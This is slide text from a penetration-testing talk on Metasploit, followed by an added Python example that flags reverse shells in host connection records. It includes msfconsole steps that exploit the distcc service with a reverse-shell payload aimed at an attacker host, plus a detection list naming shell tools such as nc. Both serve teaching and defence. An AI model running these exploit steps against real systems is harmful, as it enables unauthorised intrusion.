3. Mohammed Danish Amber ▪ Geek & Security Analyst ▪ Information Security Enthusiast ▪ Working in TCS ▪ Lecturer & Engineer ▪ Collaborative Project - Hacker Ecosystem ▪ Make Internet a Secure Place
4. Why Pen-Testing ▪ Millions of dollars have been invested in security programs that protect critical infrastructure and prevent data breaches ▪ A penetration test is one of the most effective ways to identify weaknesses and deficiencies in these programs
5. What's Pen-Testing ▪ A method to evaluate the security of a computer system / network ▪ Practice (attacking) an IT system like a 'hacker' does – Find security holes (weaknesses) – Bypass security mechanisms – Compromise an organization's IT system security ▪ MUST HAVE PERMISSION FROM THE IT SYSTEM OWNER ▪ ILLEGAL ACTIVITY CAN PUT YOU IN JAIL!
6. ETHICS ▪ THINK BEFORE YOU ACT ▪ DON'T BE STUPID ▪ DON'T BE MALICIOUS
9. Metasploit ▪ Not just a tool but an entire framework ▪ An open-source platform for writing security tools and exploits ▪ Easily build attack vectors by combining its exploits, payloads and encoders ▪ Create and execute more advanced attacks ▪ Ruby based
10. Metasploit Interfaces ▪ msfconsole ▪ msfweb, msfgui (discontinued) ▪ Metasploit Pro & Community Edition ▪ Armitage
13. Metasploit Terminology ▪ Exploit: Code that allows a pentester to take advantage of a flaw within a system, application, or service ▪ Payload: Code that we want the target system to execute (a few commands to be run on the target system) ▪ Shellcode: A set of instructions used as the payload when exploitation occurs ▪ Module: A piece of software that can be used by Metasploit ▪ Listener: A component waiting for an incoming connection
14. How does Exploitation work
Attacker -> sends Exploit + Payload -> Vulnerable Server
Vulnerable Server: Exploit runs, then Payload runs
Attacker <-> Vulnerable Server: upload / download DATA
15. Meterpreter ▪ Used as a payload after a vulnerability is exploited ▪ Improves post-exploitation capabilities
26. Ubuntu Exploitation ▪ search distcc ▪ use exploit/unix/misc/distcc_exec ▪ show payloads ▪ set PAYLOAD cmd/unix/reverse ▪ show options ▪ set rhost <victim ip> ▪ set lhost <attacker ip>
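The cmd/unix/reverse payload in the walkthrough above makes the compromised distccd daemon spawn a shell that connects back to the listener on the attacker's lhost. The following defender-side example, added here and not part of the original slides, shows how that pattern stands out in host connection data: a shell process whose parent is a network daemon, holding an established connection to a non-loopback host. The record format, process names and addresses are constructed for illustration.

```python
import ipaddress
from dataclasses import dataclass

# Constructed sample of host connection records (ss/netstat-like shape, enriched
# with the owning process and its parent process):
# "<user> <pid> <process> <parent> <local_ip:port> -> <remote_ip:port> <state>"
SAMPLE_CONNECTIONS = """\
root 812 sshd - 192.168.56.101:22 -> 192.168.56.1:50122 ESTAB
daemon 1001 distccd - 192.168.56.101:3632 -> 192.168.56.200:41022 ESTAB
daemon 1017 sh distccd 192.168.56.101:36120 -> 192.168.56.200:4444 ESTAB
daemon 1020 sh distccd 127.0.0.1:36200 -> 127.0.0.1:3632 ESTAB
www-data 1203 apache2 - 192.168.56.101:80 -> 10.0.0.5:51000 ESTAB
"""

# Daemons that accept network input and have no business spawning an outbound shell.
NETWORK_SERVICES = {"distccd", "apache2", "sshd", "smbd", "postgres"}
# Processes a command payload such as cmd/unix/reverse typically ends up running.
SHELLS = {"sh", "bash", "dash", "perl", "python", "python3", "nc"}

@dataclass
class Conn:
    user: str
    pid: int
    process: str
    parent: str
    local: str
    remote: str
    state: str

def parse_conn(line: str) -> Conn:
    """Parse one whitespace-separated record; '-' marks an unknown parent."""
    user, pid, proc, parent, local, _, remote, state = line.split()
    return Conn(user, int(pid), proc, parent, local, remote, state)

def is_reverse_shell_candidate(c: Conn) -> bool:
    """A shell spawned by a network daemon, connected out to a non-local host."""
    remote_ip = ipaddress.ip_address(c.remote.rsplit(":", 1)[0])
    return (
        c.process in SHELLS
        and c.parent in NETWORK_SERVICES
        and c.state == "ESTAB"
        and not remote_ip.is_loopback  # local helper connections are expected
    )

def find_reverse_shells(records: str) -> list[Conn]:
    """Return the connection records matching the reverse-shell pattern."""
    conns = [parse_conn(l) for l in records.splitlines() if l.strip()]
    return [c for c in conns if is_reverse_shell_candidate(c)]
```

Only pid 1017 matches: distccd itself serving a client (1001) and the shell talking to loopback (1020) are left alone.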